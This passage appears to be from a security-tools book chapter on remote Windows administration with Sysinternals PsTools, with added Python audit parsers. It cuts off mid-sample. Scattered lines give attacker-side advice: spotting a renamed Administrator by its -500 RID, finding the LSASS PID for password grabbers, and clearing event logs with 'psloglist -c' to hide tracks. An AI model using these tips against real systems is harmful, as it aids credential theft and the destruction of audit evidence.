The PsTools suite falls into the gray area between enumeration and full-system access. These tools are developed by Mark Russinovich of SysInternals and are available at http://www.sysinternals.com/ntw2k/freeware/pstools.shtml. The enum and Winfingerprint tools rely on the mighty NULL IPC$ session, but the PsTools require user credentials for some options. Nevertheless, this collection of tools turns an open NetBIOS port into a remote command execution heyday.
Instead of describing the tools in alphabetical order, we’ll start with the most innocuous and work up to the most versatile. A Windows administrator tool kit should contain these tools because they greatly simplify remote administration.
But first, here are some prerequisites for using these tools:
You must have proper user credentials. The greater functionality of these tools requires greater access. This isn’t a problem for system administrators.
The “Server” service must be started on the target system. The “NetLogon” service helps pass credentials across the domain.
The “RemoteRegistry” service is used for certain functions such as PsInfo’s hotfix enumeration.
The IPC$ share must be available.
In an environment where administration relies heavily on the GUI, the left mouse button, and Terminal Services, this suite removes an enormous amount of stress from the whole affair.
Caution | During remote administration, your username and password are flying across the network! If you’re highly concerned about sniffing attacks, make sure that your Windows 2000 and XP servers are using NTLMv2. This is a fault of the underlying Windows authentication scheme, not the PsTools. Check out Chapter 9 for more information on Windows passwords. |
PsTools consists of 12 different utilities that truly simplify administration of large networks. Remote access using Terminal Services does help, but these tools can be an integral part of automated scripts that collect log files, list active users, or run arbitrary commands across dozens of systems.
PsFile allows you to list files on one host that are in use by another host. It mirrors the functionality of the built-in net file command. This is useful for debugging file shares and tracking unauthorized file system access. The following output is shortened for the sake of brevity:
C:\>psfile.exe
Files opened remotely on GOBLYNSWOOD:
[23] D:\downloads\secretplans.txt
    User:   ORC
    Locks:  0
    Access: Read

C:\>net file

ID         Path                               User name            # Locks
--------------------------------------------------------------------
23         D:\downloads\secretplans.txt       ORC                  0

The command completed successfully.
We can tell that user ORC is viewing a text file called secretplans.txt. This tool doesn’t reveal where ORC is accessing the file from, so it isn’t very helpful as a forensic tool; that’s a job for netstat. At first glance, the information from the two commands appears redundant. The -c option works the same way as the /close option to net file: it closes a connection based on the ID (23 in the previous example):
C:\>psfile.exe 23 -c
Closed file D:\downloads\secretplans.txt on GOBLYN.
Again, there doesn’t seem to be a real advantage over the net utility. However, every PsTool works over a remote connection. The usage is the same, with the addition of the user credentials on the command line.
C:\>psfile.exe \\192.168.0.176 -u Administrator -p IM!secure
Files opened remotely on 192.168.0.176:
[32] \PIPE\srvsvc
    User:   ADMINISTRATOR
    Locks:  0
    Access: Read Write
If you run psfile against your localhost and specify its IP address, you’ll see that it opens a connection to the server service.
Note | Just about every PsTool accepts the \\RemoteHost -u UserName -p password options, even if the tool’s command-line help (/h) doesn’t explicitly state it. |
Don’t accuse the PsTools of obscure naming conventions. PsLoggedOn displays the users who are logged on to a system, whether through the console, a file share, or another remote method:
C:\>psloggedon.exe
Users logged on locally:
     <Unknown>              NT AUTHORITY\LOCAL SERVICE
     <Unknown>              NT AUTHORITY\NETWORK SERVICE
     3/10/2002 11:23:49 AM  GOBLYNSWOOD\pyretta
     <Unknown>              NT AUTHORITY\SYSTEM

Users logged on via resource shares:
     3/12/2002 12:04:12 AM  (null)\ORC
From a defense perspective, the list of users logged on via resource shares can be especially helpful to administrators. You may wish to schedule tasks that check sensitive systems such as domain controllers, web servers, or the finance department’s database. You could rely on the system’s event logs, but a malicious user could erase them. Having another copy from the scheduled task provides good redundancy.
From an attacker’s perspective, it may not be prudent to launch buffer overflow attacks or other exploits against systems that have users currently logged onto them.
Renaming the Administrator account to “TeflonBilly” might be fun, but do not consider it a true security measure. With PsGetSid, anyone with a NULL connection can obtain a string called the Security Identifier (SID) for a particular user. The final part of this string contains the Relative Identifier (RID). For the Administrator account, regardless of the account name, the RID is always 500—much like the root user on Unix is always 0. The Guest account is always 501. These two RIDs never change.
C:\>psgetsid.exe \\192.168.0.176 -u Administrator -p IM!secure Orc
SID for 192.168.0.176\\Orc: S-1-5-21-1454471165-484763869-1708537768-501
Tip | When targeting the “Administrator,” always verify that the account has a SID that ends in -500. Otherwise, you know that the account has been renamed. |
A SID request does not have to target a user. PsGetSid can enumerate other objects such as the computer and user groups:
C:\>psgetsid.exe \\192.168.0.176 -u Administrator -p IM!secure goblynswood
SID for 192.168.0.176\\goblynswood: S-1-5-21-1454471165-484763869-1708537768

C:\>psgetsid.exe \\192.168.0.176 -u Administrator -p IM!secure "Power Users"
SID for 192.168.0.176\\goblynswood: S-1-5-32-547
Alone, this type of information is not particularly useful, but when cross-referenced with user RIDs from SAM files or other sources, it fills a large part of the domain’s authentication structure.
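The RID check described above is easy to automate across a set of hosts. The following Python script is an added example written for this section; it is not part of the PsTools and is not the author’s code. It parses the output of psgetsid runs, splits each SID into its issuing prefix and RID, reports what the SID really identifies regardless of the account’s display name (the text’s TeflonBilly case), and notes when two hosts return local accounts with the same machine SID prefix, which usually means cloned disk images. The first sample line is the text’s own Orc example; hosts 192.168.0.177 through .179, the TeflonBilly SID value and the error message are constructed. The built-in group SIDs 544 (Administrators) and 545 (Users) are standard values that the text does not list.

```python
import re
from typing import Dict, List, Optional, Tuple

# psgetsid prints "SID for <host>\\<account>:" followed by the SID, either on the same
# line (as the text shows it) or on the next one.  The doubled backslash is how the
# tool itself prints the separator, so the pattern accepts one or more.
_SID_HEAD = re.compile(
    r"^SID for (?P<host>[^\\]+)\\+(?P<account>[^:]+):\s*(?P<sid>S-1-[0-9-]+)?\s*$"
)
_SID_ONLY = re.compile(r"^S-1-[0-9-]+$")

# Relative identifiers that never change: the two the text names.
WELL_KNOWN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}
# Built-in local groups live under S-1-5-32.  547 (Power Users) appears in the text;
# 544 (Administrators) and 545 (Users) are the other two commonly audited.
BUILTIN_GROUPS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-545": "Users",
    "S-1-5-32-547": "Power Users",
}


def parse_psgetsid(output: str) -> Optional[Tuple[str, str, str]]:
    """Return (host, account, sid) from one psgetsid run, or None if no SID came back."""
    lines = [ln.strip() for ln in output.splitlines() if ln.strip()]
    for i, line in enumerate(lines):
        m = _SID_HEAD.match(line)
        if not m:
            continue
        sid = m.group("sid")
        if sid is None and i + 1 < len(lines) and _SID_ONLY.match(lines[i + 1]):
            sid = lines[i + 1]
        if sid:
            return m.group("host"), m.group("account").strip(), sid
    return None


def split_sid(sid: str) -> Tuple[str, int]:
    """Split a SID into its issuing prefix (domain or machine SID) and trailing RID."""
    prefix, _, rid = sid.rpartition("-")
    return prefix, int(rid)


def classify(account: str, sid: str) -> str:
    """Say what a SID really identifies, whatever the account has been renamed to."""
    if sid in BUILTIN_GROUPS:
        return f"built-in group {BUILTIN_GROUPS[sid]}"
    _, rid = split_sid(sid)
    if rid in WELL_KNOWN_RIDS:
        label = WELL_KNOWN_RIDS[rid]
        if rid == 500 and account.lower() != "administrator":
            label += f" (renamed to '{account}')"
        return label
    return "ordinary account or group"


def audit_hosts(outputs: Dict[str, str]) -> List[Dict[str, str]]:
    """Summarise psgetsid runs keyed by host.  For local accounts, two hosts sharing a
    machine SID prefix usually means a cloned disk image; domain accounts legitimately
    share the domain prefix, so only compare like with like."""
    rows: List[Dict[str, str]] = []
    first_host_for_prefix: Dict[str, str] = {}
    for host, output in outputs.items():
        parsed = parse_psgetsid(output)
        if parsed is None:
            rows.append({"host": host, "error": "no SID returned (bad credentials, host down, or no such account)"})
            continue
        _, account, sid = parsed
        prefix, _ = split_sid(sid)
        row = {"host": host, "account": account, "sid": sid, "what": classify(account, sid)}
        if prefix in first_host_for_prefix and first_host_for_prefix[prefix] != host:
            row["note"] = f"same machine SID prefix as {first_host_for_prefix[prefix]}"
        first_host_for_prefix.setdefault(prefix, host)
        rows.append(row)
    return rows


# Constructed sample runs: the first line is the text's own example; the rest are made up.
SAMPLE_RUNS = {
    "192.168.0.176": "SID for 192.168.0.176\\\\Orc: S-1-5-21-1454471165-484763869-1708537768-501",
    "192.168.0.177": "SID for 192.168.0.177\\\\TeflonBilly:\nS-1-5-21-2042117851-1086322604-1246981395-500",
    "192.168.0.178": "Couldn't access 192.168.0.178:\nAccess is denied.",
    "192.168.0.179": "SID for 192.168.0.179\\\\Administrator: S-1-5-21-1454471165-484763869-1708537768-500",
}

if __name__ == "__main__":
    for row in audit_hosts(SAMPLE_RUNS):
        print(row)
```

In practice you would fill the dictionary from a loop that runs psgetsid against each host in a list (as the PsInfo batch file later in this section does) and capture each run’s output to a file; the parser does not care whether the SID lands on the same line as the header or the next one.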
Operating system, uptime (based on deduction from the event logs), system root, install date, blah, blah, blah—the data almost sounds interesting. Do not mistake PsInfo for a fluff tool. It returns useful data about the system. And, remember, it does so remotely!
PsInfo 1.34 - local and remote system information viewer
Copyright (C) 2001-2002 Mark Russinovich
Sysinternals - www.sysinternals.com

System information for \\ARRAKIS:
Uptime:                    0 days, 0 hours, 58 minutes, 9 seconds
Kernel version:            Microsoft Windows XP, Uniprocessor Free
Product type:              Professional
Product version:           5.1
Service pack:              1
Kernel build number:       2600
Registered organization:
Registered owner:          Michael Shema
Install date:              08/11/2002, 22:26:38
Activation status:         Activated
IE version:                6.0000
System root:               C:\WINDOWS
Processors:                1
Processor speed:           665 Mhz
Processor type:            x86 Family 6 Model 8 Stepping 4, ConnectixCPU
Physical memory:           196 MB
As you can see, PsInfo provides a quick method for checking your servers for the latest hotfixes. If you’re running IIS, you should be religiously applying hotfixes. PsInfo pulls hotfix information from the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix registry key, so some application patches may not appear in this list.
A batch file makes this system enumeration easy:
C:\>for /L %i in (1,1,254) do psinfo \\192.168.0.%i > systeminfo_192.168.0.%i.txt
Notice that we’ve left out the authentication credentials. If you’re going to create a batch file that needs to access remote systems, don’t place the username and password in the batch file. Instead, run the batch file in the context of a domain user with permissions to enumerate this information. The only problem you’ll encounter is difficulty accessing systems that are not part of the domain.
This robust tool enables you to view and manipulate services remotely. The Windows net start and net stop commands tremble in the presence of PsService. With no command-line options, PsService returns a list of every service installed on the system. The following output has been shortened for brevity, but it includes complete descriptions for two services:
C:\>psservice.exe

SERVICE_NAME: inetd
DISPLAY_NAME: CYGWIN inetd
(null)
        TYPE              : 10 WIN32_OWN_PROCESS
        STATE             : 1  STOPPED (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE   : 1077 (0x435)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT        : 0x0
        WAIT_HINT         : 0x0

SERVICE_NAME: SharedAccess
DISPLAY_NAME: Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)
Provides network address translation, addressing, name resolution and/or intrusion prevention services for a home or small office network.
        TYPE              : 20 WIN32_SHARE_PROCESS
        STATE             : 4  RUNNING (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE   : 0 (0x0)
        SERVICE_EXIT_CODE : 0 (0x0)
        CHECKPOINT        : 0x0
        WAIT_HINT         : 0x0
Service information, regardless of whether or not the service is currently running, indicates the role of a system, security software installed, and possibly its relative importance on a network. A server that backs up the PDC will have a backup service running, and an e-mail server might have an anti-virus server running. Even so, PsService also provides control over the services. Specify one of the following commands to manipulate a service:
PsService “Cmd” Option | Description |
---|---|
query | Queries the status of a service |
config | Queries the configuration |
start | Starts a service |
stop | Stops a service |
restart | Stops and then restarts a service |
pause | Pauses a service |
cont | Continues a paused service |
depend | Enumerates the services that depend on the one specified |
find | Searches for an instance of a service on the network |
After the command, specify the service to be affected. For example, here’s how to start IIS on a remote computer (assuming you are logged in to the domain as an administrator):
C:\>psservice.exe \\192.168.0.39 start w3svc
You could also stop, restart, pause, or continue the service. The config command differs slightly from the query command, which provides the information when PsService runs without options. The config command returns information about the actual program the service executes:
C:\>psservice.exe config inetd

SERVICE_NAME: inetd
(null)
        TYPE              : 10 WIN32_OWN_PROCESS
        START_TYPE        : 3 DEMAND_START
        ERROR_CONTROL     : 1 NORMAL
        BINARY_PATH_NAME  : d:\cygwin\usr\sbin\inetd.exe
        LOAD_ORDER_GROUP  :
        TAG               : 0
        DISPLAY_NAME      : CYGWIN inetd
        DEPENDENCIES      :
        SERVICE_START_NAME: LocalSystem
Finally, the find command can be used to hunt down services running on a network. In a way, it can be a roundabout port scanner. For example, to find hosts in a domain that are running Terminal Services, look for the termservice service:
C:\>psservice.exe find termservice
Found termservice on:
  \\ZIGGURAT
  \\GOBLYNSWOOD
Use this in conjunction with a port scanner to identify rogue IIS installations on your network.
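The query and config output shown above is regular enough to audit by script. The following Python parser is an added example for this section (not the author’s code and not part of PsTools): it turns psservice or psservice config output into one record per service, then flags every BINARY_PATH_NAME that lives outside the expected system directories or that is unquoted while containing spaces, the two properties a reviewer looks for first when deciding whether a service belongs on a server. The embedded sample is constructed in the same layout as the inetd output above; the services AcmeUpdater and BackupAgent, their paths, and the TRUSTED_ROOTS list are assumptions for the example.

```python
import re
from typing import Dict, List, Tuple

# psservice prints one "KEY : value" line per field and starts a new service record at
# SERVICE_NAME.  Lines without an upper-case key (the "(null)" or free-text description
# that follows DISPLAY_NAME) are folded into a DESCRIPTION field.
_FIELD = re.compile(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$")

# Directories a service image is expected to live under (an assumption for this
# example; adjust to the system roots actually in use on your servers).
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\winnt\\")


def parse_psservice(output: str) -> List[Dict[str, str]]:
    """Turn psservice / psservice config output into a list of per-service dicts."""
    records: List[Dict[str, str]] = []
    current = None
    for line in output.splitlines():
        if not line.strip():
            continue
        m = _FIELD.match(line)
        if m and m.group(1) == "SERVICE_NAME":
            current = {"SERVICE_NAME": m.group(2)}
            records.append(current)
        elif m and current is not None:
            current[m.group(1)] = m.group(2)
        elif current is not None:
            desc = current.get("DESCRIPTION", "")
            current["DESCRIPTION"] = (desc + " " + line.strip()).strip()
    return records


def image_path(binary_path_name: str) -> Tuple[str, bool]:
    """Return (path to the image, quoted?) from a BINARY_PATH_NAME value.

    A quoted value is taken up to the closing quote; an unquoted value is taken up to
    and including the first ".exe", which is where its arguments begin."""
    value = binary_path_name.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        return (value[1:end] if end > 0 else value[1:]), True
    m = re.match(r"^(.*?\.exe)", value, re.IGNORECASE)
    return (m.group(1) if m else value.split(" ", 1)[0]), False


def audit_services(records: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Flag images outside the trusted roots and unquoted image paths containing spaces."""
    findings: List[Tuple[str, str]] = []
    for rec in records:
        raw = rec.get("BINARY_PATH_NAME", "")
        if not raw:
            continue  # plain "psservice" query output carries no BINARY_PATH_NAME
        path, quoted = image_path(raw)
        name = rec["SERVICE_NAME"]
        if not quoted and " " in path:
            findings.append((name, "unquoted image path containing spaces"))
        lowered = path.lower().replace("/", "\\")
        if not any(lowered.startswith(root) for root in TRUSTED_ROOTS):
            findings.append((name, f"image outside trusted roots: {path}"))
    return findings


# Constructed sample in the layout of "psservice config": inetd is the text's own
# example; Dhcp, AcmeUpdater and BackupAgent are made up for the audit.
SAMPLE_CONFIG = r"""
SERVICE_NAME: inetd
(null)
        TYPE              : 10 WIN32_OWN_PROCESS
        START_TYPE        : 3 DEMAND_START
        ERROR_CONTROL     : 1 NORMAL
        BINARY_PATH_NAME  : d:\cygwin\usr\sbin\inetd.exe
        LOAD_ORDER_GROUP  :
        TAG               : 0
        DISPLAY_NAME      : CYGWIN inetd
        DEPENDENCIES      :
        SERVICE_START_NAME: LocalSystem
SERVICE_NAME: Dhcp
        TYPE              : 20 WIN32_SHARE_PROCESS
        BINARY_PATH_NAME  : C:\WINDOWS\System32\svchost.exe -k netsvcs
        DISPLAY_NAME      : DHCP Client
        SERVICE_START_NAME: LocalSystem
SERVICE_NAME: AcmeUpdater
        TYPE              : 10 WIN32_OWN_PROCESS
        BINARY_PATH_NAME  : C:\Program Files\Acme Updater\updater.exe -run
        DISPLAY_NAME      : Acme Updater
        SERVICE_START_NAME: LocalSystem
SERVICE_NAME: BackupAgent
        TYPE              : 10 WIN32_OWN_PROCESS
        BINARY_PATH_NAME  : "C:\Program Files\Backup Agent\agent.exe"
        DISPLAY_NAME      : Backup Agent
        SERVICE_START_NAME: LocalSystem
"""

if __name__ == "__main__":
    for service, issue in audit_services(parse_psservice(SAMPLE_CONFIG)):
        print(f"{service}: {issue}")
```

Feed it the saved output of psservice config run against each host (one file per host, as the PsInfo batch loop below does) and keep the findings alongside the service list; a service image that appears outside the system directories on only one of a set of identically built web servers is worth a closer look.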
When your Unix friends make fun of the Windows process list commands, mention PsList and you might see a few knowing winks or a little jealousy. PsList displays a process list for the local or remote system. The -d, -m, and -x options show information about threads, memory, and a combination of the two, respectively. However, you will probably need to use only a plain pslist:
C:\>pslist.exe

Process information for GOBLYNSWOOD:

Name          Pid Pri Thd  Hnd   Mem     User Time   Kernel Time   Elapsed Time
Idle            0   0   1    0    16   0:00:00.000   3:57:29.219    0:00:00.000
System          8   8  39  319   216   0:00:00.000   0:00:11.536    0:00:00.000
SMSS          152  11   6   33   560   0:00:00.210   0:00:00.741    4:27:11.031
CSRSS         180  13  10  494  3560   0:00:00.650   0:01:30.890    4:26:59.084
WINLOGON      200  13  17  364  3256   0:00:00.230   0:00:01.081    4:26:55.879
SERVICES      228   9  30  561  5640   0:00:01.542   0:00:03.535    4:26:48.058
LSASS         240   9  14  307   520   0:00:00.260   0:00:00.230    4:26:48.028
svchost       420   8   9  333  3748   0:00:00.150   0:00:00.150    4:26:41.839
spoolsv       452   8  12  166  3920   0:00:00.070   0:00:00.160    4:26:41.088
You can also gather information about a specific process name or process ID by calling it on the command line. For example, to see how much of your system resources Internet Explorer has chewed away try this:
C:\>pslist.exe iexplore

Process information for GOBLYNSWOOD:

Name          Pid Pri Thd  Hnd    Mem     User Time   Kernel Time   Elapsed Time
IEXPLORE      636   8  17  805  26884   0:00:14.711   0:00:17.154    4:38:27.694
IEXPLORE     1100   8  28 1054  27980   0:00:24.375   0:00:40.888    4:36:25.388
Tip | A handful of password-grabbing utilities require the process ID (PID) of the LSASS program. PsList is the perfect way to find it. |
The -s and -r options really come in handy for monitoring important servers or even debugging code. The -s option puts PsList into Task Manager mode. In other words, it performs a continuous refresh until you press ESC, much like the Unix top command. The -r option sets the refresh rate in seconds. For example, you can monitor the IIS service process on a web server every 10 seconds:
C:\>pslist.exe -s -r 10 inetinfo.exe
The -t option displays each process and its threads in a tree format, making it easier to visualize the process relationships on the system. Here’s an abbreviated output that shows the system threads:
C:\>pslist.exe -t

Process information for GOBLYNSWOOD:

Name          Pid Pri Thd  Hnd     VM    WS   Priv
Idle            0   0   1    0      0    16      0
System          8   8  39  323   1668   216     24
SMSS          152  11   6   33   5248   560   1072
CSRSS         180  13  10  502  22700  3576   1512
WINLOGON      200  13  17  364  35812  3252   5596
SERVICES      228   9  31  563  33748  5652   2772
svchost       420   8   9  333  22624  3748   1528
MDM          1420   8   3   96  25996  2640    924
Avsynmgr      556   8   4  139  28024  2708   1460
VSStat        896   8   2  112  26376  2664   1376
vshwin32      956   8   7  219  54220  6468   3908
WebScanX     1036   8   3  194  40020  6052   4628
Avconsol      976   8   2  112  28500  2640   1484
svchost       592   8  33  449  43592  8084   3364
LSASS         240   9  14  307  28080   864   2344
explorer     1200   8  17  468  99580  4460  11912
As you can list a process, so you can kill it (or suspend it if you’re feeling gracious). The PsKill tool takes either a process name or ID as an argument. If you rely on the PID, you’ll need to use PsKill in conjunction with PsList. On the other hand, specifying the process by name might kill more processes than you intended. Both methods are susceptible to the “oops” vulnerability—mistyping a PID and accidentally killing the wrong process.
C:\>pslist.exe | findstr /i notepad
notepad      1764   8   1   30  1728   0:00:00.020   0:00:00.020    0:00:07.400
notepad      1044   8   1   30  1724   0:00:00.020   0:00:00.020    0:00:05.077
notepad      1796   8   1   30  1724   0:00:00.010   0:00:00.020    0:00:03.835

C:\>pskill.exe 1764
process #1764 killed

C:\>pskill.exe notepad
2 processes named notepad killed.
Caution | Be aware of killing processes by name. PsKill matches every process, not just the first one it encounters. It does not honor wildcards, such as the asterisk (*). |
PsSuspend works in the same manner. Specify a process name or ID after the command to suspend that process:
C:\>pssuspend.exe 1116
Process 1116 suspended.
Use the –r option to resume a process:
C:\>pssuspend.exe -r 1116
Process 1116 resumed.
Note | Remember that these tools work remotely, but they require user authentication. An open NetBIOS port doesn’t expose the entire system to compromise. However, there is a problem with an open NetBIOS port and a blank administrator password (we’ve seen plenty of these). Use the PsTools to tighten and audit your network. |
The event log contains a wealth of information about system health, service status, and security. Unfortunately, the awkwardness of the Event Log Viewer typically precluded administrators from running quick log audits. Unlike the Unix world, where the majority of logs are in text format, the Windows event logs are a binary puzzle. The advent of PsLogList makes two things possible: Logfiles can be extracted to a text format and parsed into spreadsheets or other formats, and logfiles can be retrieved remotely to consolidate, back up, and preserve their content.
PsLogList v2.31 - local and remote event log viewer
Copyright (C) 2000-2003 Mark Russinovich
Sysinternals - www.sysinternals.com

PsLogList dumps event logs on a local or remote NT system.

Usage: psloglist [\\RemoteComputer [-u Username [-p Password]]] [-s [-t delimiter]]
                 [-n # | -d #] [-c] [-x] [-r] [-a mm/dd/yy] [-b mm/dd/yy]
                 [-f filter] [-i ID] [-o event source] [-l event log file] <event log>
The following table details the available options:
PsLogList Option | Description |
---|---|
-a <mm/dd/yy> | Dumps records timestamped after specified date. |
-b <mm/dd/yy> | Dumps records timestamped before specified date. |
-c | Clears event log after displaying. |
-d <digit(s)> | Displays only records from previous n days. |
-f <e|i|w> | Filters event types, using starting letter (for example, -f we to filter warnings and errors). |
-i <Event ID> | Shows only events with the specified ID. |
-l | Dumps the contents of the specified saved event log file. |
-n <digit(s)> | Displays only n most recent records. |
-o <source> | Shows only records from the specified event source (for example, -o cdrom). |
-p | Specifies password for username. |
-r | Dumps log from least recent to most recent. |
-s | Lists records on one line each with delimited fields, which is convenient for string searches. |
-t <character> | Default delimiter for the -s option is a comma; can be overridden with the specified character. |
-u | Specifies optional username for login to remote computer. |
-x | Dumps extended data. |
<eventlog> | Specifies event log to dump. Default is system. If the -l switch is present, then the event log name specifies how to interpret the event log file. |
PsLogList displays the logfile contents in a long format or a consolidated, comma-delimited manner. By default, PsLogList returns the long format of the system log:
C:\>psloglist

PsLogList v2.31 - local and remote event log viewer
Copyright (C) 2000-2003 Mark Russinovich
Sysinternals - www.sysinternals.com

System log on \\ARRAKIS:
[549] Service Control Manager
   Type:     INFORMATION
   Computer: ARRAKIS
   Time:     25/07/2003 22:27:10     ID: 7036
The WMI Performance Adapter service entered the stopped state.
Output in a comma-delimited format is obtained by the –s option. Once more, the example has been shortened for clarity:
C:\>psloglist -s

PsLogList v2.31 - local and remote event log viewer
Copyright (C) 2000-2003 Mark Russinovich
Sysinternals - www.sysinternals.com

System log on \\ARRAKIS:
551,System,Tcpip,INFORMATION,ARRAKIS,Fri Jul 25 23:26:46 2003,4201, None, The system detected that network adapter \DEVICE\TCPIP_{056213EA-3E98-4CBB-8997-5145022A8FDC} was connected to the network, and has initiated normal operation over the network adapter.
Any of the three event logs—application, security, or system—can be viewed:
C:\>psloglist -s security

PsLogList v2.31 - local and remote event log viewer
Copyright (C) 2000-2003 Mark Russinovich
Sysinternals - www.sysinternals.com

Security log on \\ARRAKIS:
2017,Security,Security,AUDIT SUCCESS,ARRAKIS,Mon Jul 28 10:36:12 2003, 520,SYSTEM\NT AUTHORITY,The system time was changed.
   Process ID: 1176
   Process Name: C:\WINDOWS\CNTX\VPCSRVC.EXE
   Primary User Name: ARRAKIS$
   Primary Domain: WORKGROUP
   Primary Logon ID: (0x0,0x3E7)
   Client User Name: ARRAKIS$
   Client Domain: WORKGROUP
   Client Logon ID: (0x0,0x3E7)
   Previous Time: 10:36:12 28/07/2003
   New Time: 10:36:12 28/07/2003
The –f option enables you to filter events based on one of five types: Warning (w), Information (i), Errors (e), Audit Success, and Audit Failure. (The letters in parentheses are abbreviations that PsLogList accepts.) The two audit types apply only to the security log and must be wrapped in quotation marks:
C:\>psloglist.exe -s -f "Audit Success" Security > Security_successes.log
Use PsLogList to help maintain and follow your network’s audit policy. Although this tool does not toggle event log settings, use it to coordinate logs and generate daily, weekly, or monthly reports about your network. Proper log review will not only catch malicious users, but it also helps maintain a healthy network.
Caution | The –c option will actually clear the logfile after it has been dumped. Use this option with care, as you may inadvertently erase logfiles that have not yet been backed up. |
C:\>psloglist.exe -c Application
...output truncated...
Application event log on GOBLYNSWOOD cleared.

C:\>psloglist.exe Application
Application log on \\GOBLYNSWOOD:
No records in Application event log on GOBLYNSWOOD.
Note | An attacker could use the –c option to clear event logs to hide her tracks. |
The –a and –b options retrieve events after and before the supplied date in the "mm/dd/yy" format. For example, here’s how to view the previous day’s security events (using 02/09/02 as the current day):
C:\>psloglist.exe -a 02/08/02 -b 02/09/02 Security
Finally, PsLogList reads the binary event log files from any system. Supply the filename to the –l option. In this instance, PsLogList deduces the log type (application, security, system):
C:\>psloglist.exe -l Security.evt
The latest version of PsLogList introduces two new options. The first option filters events with a specific event ID (-i). The second option filters events with a specific event source (-o). Thus, you can look for specific events with strong security implications such as failed logon/logoff events in the security log:
C:\>psloglist -s security -i 529

PsLogList v2.31 - local and remote event log viewer
Copyright (C) 2000-2003 Mark Russinovich
Sysinternals - www.sysinternals.com

Security log on \\ARRAKIS:
1962,Security,Security,AUDIT FAILURE,ARRAKIS,Fri Jul 25 21:39:35 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure:
   Reason:        Unknown user name or bad password
   User Name:     Muaddib
   Domain:        ARRAKIS
   Logon Type:    2
   Logon Process: Advapi
   Authentication Package: Negotiate
   Workstation Name: ARRAKIS
1919,Security,Security,AUDIT FAILURE,ARRAKIS,Tue Jul 22 16:13:58 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure:
   Reason:        Unknown user name or bad password
Or you can check for errors from specific sources in the application or system logs:
C:\>psloglist -s system -o dhcp

PsLogList v2.31 - local and remote event log viewer
Copyright (C) 2000-2003 Mark Russinovich
Sysinternals - www.sysinternals.com

System log on \\ARRAKIS:
469,System,Dhcp,WARNING,ARRAKIS,Mon Jul 21 13:47:24 2003,1007,None,Your computer has automatically configured the IP address for the Network Card with network address 0003FFABA4F6. The IP address being used is 169.254.235.60.
468,System,Dhcp,WARNING,ARRAKIS,Mon Jul 21 13:47:19 2003,1003,None,Your computer was not able to renew its address from the network (from the DHCP Server) for the Network Card with network address 0003FFABA4F6. The following error occurred: The semaphore timeout period has expired. . Your computer will continue to try and obtain an address on its own from the network address (DHCP) server.
Sources are easily identified from the “Source” column when you launch the GUI-based Event Viewer (eventvwr.exe).
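The comma-delimited -s output is what makes scripted log review practical, but two details trip up a naive split: the message field contains commas of its own, and it continues over several lines. The following Python parser is an added example written for this section (not the author’s code and not part of PsTools). It reads psloglist -s output, joins continuation lines back onto their records, splits at most eight times so the message stays intact, counts event 529 failures per user name, lists user names that exceed a threshold, and picks out records showing the Security log was cleared, which is the trace that the -c option described above leaves behind (event ID 517, the standard pre-Vista value; the text does not list it). The embedded sample is constructed in the same layout as the examples above; the user name Chani, the extra record numbers and the 517 record are made up.

```python
import re
from collections import Counter
from typing import Dict, List

# Field order of one "psloglist -s" record.  The message is last and may itself
# contain commas and line breaks, so a record is split at most eight times and
# continuation lines are joined onto it.
FIELDS = ("record", "log", "source", "type", "computer", "time", "event_id", "user", "message")
_RECORD_START = re.compile(r"^\d+,")
_USER_NAME = re.compile(r"\bUser Name:\s*(\S+)")

FAILED_LOGON_ID = 529   # the text's example: unknown user name or bad password
LOG_CLEARED_ID = 517    # pre-Vista "The audit log was cleared"; a known ID, not one the text lists


def parse_psloglist_s(output: str) -> List[Dict]:
    """Parse psloglist -s output (banner included) into one dict per event."""
    events: List[Dict] = []
    buf: List[str] = []

    def flush() -> None:
        if not buf:
            return
        text = " ".join(part.strip() for part in buf)
        parts = [p.strip() for p in text.split(",", len(FIELDS) - 1)]
        if len(parts) == len(FIELDS) and parts[6].isdigit():
            ev = dict(zip(FIELDS, parts))
            ev["record"], ev["event_id"] = int(ev["record"]), int(ev["event_id"])
            events.append(ev)
        buf.clear()

    for line in output.splitlines():
        if _RECORD_START.match(line):
            flush()              # a new record number starts the next event
            buf.append(line)
        elif buf:
            buf.append(line)     # continuation of the current event's message
        # lines before the first record (the PsLogList banner) are ignored
    flush()
    return events


def failed_logons_by_user(events: List[Dict]) -> Counter:
    """Count event 529 records per user name taken from the message body."""
    counts: Counter = Counter()
    for ev in events:
        if ev["event_id"] == FAILED_LOGON_ID:
            m = _USER_NAME.search(ev["message"])
            counts[m.group(1) if m else "<unknown>"] += 1
    return counts


def repeated_failures(events: List[Dict], threshold: int = 3) -> List[str]:
    """User names with at least `threshold` failed logons (a password-guessing signal)."""
    return sorted(u for u, n in failed_logons_by_user(events).items() if n >= threshold)


def cleared_log_events(events: List[Dict]) -> List[Dict]:
    """Records Windows writes when the Security log is cleared."""
    return [ev for ev in events if ev["event_id"] == LOG_CLEARED_ID]


# Constructed sample in the layout psloglist -s prints: banner, then records whose
# messages run over several lines.  Host and the Muaddib user follow the text; the
# Chani failures, record numbers and the 517 record are made up.
SAMPLE_OUTPUT = r"""PsLogList v2.31 - local and remote event log viewer
Copyright (C) 2000-2003 Mark Russinovich
Sysinternals - www.sysinternals.com

Security log on \\ARRAKIS:
1962,Security,Security,AUDIT FAILURE,ARRAKIS,Fri Jul 25 21:39:35 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure:
   Reason:        Unknown user name or bad password
   User Name:     Muaddib
   Domain:        ARRAKIS
   Logon Type:    2
   Logon Process: Advapi
   Authentication Package: Negotiate
   Workstation Name: ARRAKIS
1961,Security,Security,AUDIT FAILURE,ARRAKIS,Fri Jul 25 21:39:20 2003, 529,SYSTEM\NT AUTHORITY,Logon Failure:
   Reason:        Unknown user name or bad password
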